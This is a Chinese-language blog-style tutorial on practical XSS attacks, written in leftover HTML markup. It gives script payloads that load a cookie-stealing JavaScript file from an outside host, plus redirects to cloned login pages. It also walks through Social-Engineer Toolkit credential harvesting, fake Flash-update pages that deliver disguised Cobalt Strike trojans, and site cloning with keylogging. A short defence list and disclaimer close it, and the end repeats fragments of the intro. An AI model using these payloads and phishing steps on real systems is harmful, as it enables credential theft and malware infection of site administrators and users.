XSS实战攻击思路总结<\/h1>

前言<\/h2>
本文总结了XSS(跨站脚本攻击)的多种实战攻击思路，通过实际案例演示如何利用XSS漏洞进行攻击。这些技术仅供网络安全学习和研究使用，禁止用于非法用途。<\/p>

钓鱼网站鉴别方法<\/h2>

域名分析<\/h3>

检查一级域名是否合法

示例：qq.xps.com中"qq"是二级域名，一级域名xps.com暴露了钓鱼本质<\/li> <\/ul> <\/li>

注意拉丁字母伪造域名

示例：

真域名：www.oppo.com<\/li>
假域名：www.οppο.com (使用希腊字母ο代替o)<\/li>
真域名：www.pornhub.com<\/li>

假域名：www.ρornhub.com (使用希腊字母ρ代替p)<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol>

功能分析<\/h3>

使用目录扫描工具发现后台

示例：dirsearch扫描发现后台登录口http:\/\/qq.xps.com\/admin\/login.php<\/li> <\/ul> <\/li>

观察钓鱼流程

用户输入账号密码后跳转至真实网站<\/li>

让用户误以为第一次是输入错误<\/li> <\/ul> <\/li> <\/ol>

XSS攻击思路<\/h2>

思路一：XSS盲打<\/h3>

准备XSS平台

推荐BlueLotus_XSSReceiver<\/li>
项目地址：https:\/\/github.com\/sqlsec\/BlueLotus_XSSReceiver<\/li> <\/ul> <\/li>

生成XSS payload

<script<\/span> src<\/span>=<\/span>http:\/\/10.20.24.244\/xss\/myjs\/x.js<\/span>><\/script<\/span>>
<\/span><\/span><\/code><\/pre><\/li>
插入payload

优先选择密码输入框<\/li>
如有长度限制，审查元素修改input长度<\/li>
<\/ul>
<\/li>
获取管理员cookie

当管理员查看钓鱼记录时触发XSS<\/li>
获取后台地址和cookie后可登录后台<\/li>
<\/ul>
<\/li>
<\/ol>
思路二：SET钓鱼(针对HttpOnly)<\/h3>

使用Kali Linux的SET工具

项目地址：https:\/\/github.com\/trustedsec\/social-engineer-toolkit<\/li>
<\/ul>
<\/li>
操作步骤：
1) Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner
<\/code><\/pre>
<\/li>
克隆目标网站后台登录页面<\/li>
使用XSS诱导管理员访问克隆页面
<script<\/span>>window.location<\/span>.href<\/span>=<\/span>"http:\/\/10.20.25.39\/"<\/span><\/script<\/span>>
<\/span><\/span><\/code><\/pre><\/li>
获取管理员输入的明文凭证<\/li>
<\/ol>
思路三：Flash钓鱼<\/h3>

准备钓鱼页面

项目1：模仿Flash Player中文官网

地址：https:\/\/github.com\/Wileysec\/adobe-flash-phishing-page<\/li>
<\/ul>
<\/li>
项目2：激进提示升级页面

地址：https:\/\/github.com\/r00tSe7en\/Flash-Pop<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
诱导下载恶意程序

示例："立即升级"按钮下载CS木马<\/li>
<\/ul>
<\/li>
木马上线

建议为木马添加图标伪装<\/li>
参考：为Cobalt Strike exe木马添加图标<\/li>
<\/ul>
<\/li>
<\/ol>
其他思路补充<\/h2>


使用Cobalt Strike克隆网站<\/p>

操作路径："攻击"-"钓鱼攻击"-"克隆网站"<\/li>
勾选键盘记录功能<\/li>
相比SET能模仿更多复杂网站(约85%相似度)<\/li>
<\/ul>
<\/li>

OpenResty反代方案<\/p>

使用OpenResty反代目标网站实现完全镜像<\/li>
在尾部插入自定义JS代码<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

对用户输入进行严格过滤<\/li>
设置HttpOnly属性保护cookie<\/li>
保持警惕，注意域名细节<\/li>
谨慎点击不明链接和下载<\/li>
<\/ol>
免责声明<\/h2>
本文所述技术仅供网络安全学习和研究使用，禁止用于非法用途。使用者需自行承担相关法律责任。<\/p>

XSS实战攻击思路总结<\/h1>

前言<\/h2> 本文总结了XSS(跨站脚本攻击)的多种实战攻击思路，通过实际案例演示如何利用XSS漏洞进行攻击。这些技术仅供网络安全学习和研究使用，禁止用于非法用途。<\/p>

钓鱼网站鉴别方法<\/h2>

XSS攻击思路<\/h2>

免责声明<\/h2> 本文所述技术仅供网络安全学习和研究使用，禁止用于非法用途。使用者需自行承担相关法律责任。<\/p>

前言<\/h2>
本文总结了XSS(跨站脚本攻击)的多种实战攻击思路，通过实际案例演示如何利用XSS漏洞进行攻击。这些技术仅供网络安全学习和研究使用，禁止用于非法用途。<\/p>

免责声明<\/h2>
本文所述技术仅供网络安全学习和研究使用，禁止用于非法用途。使用者需自行承担相关法律责任。<\/p>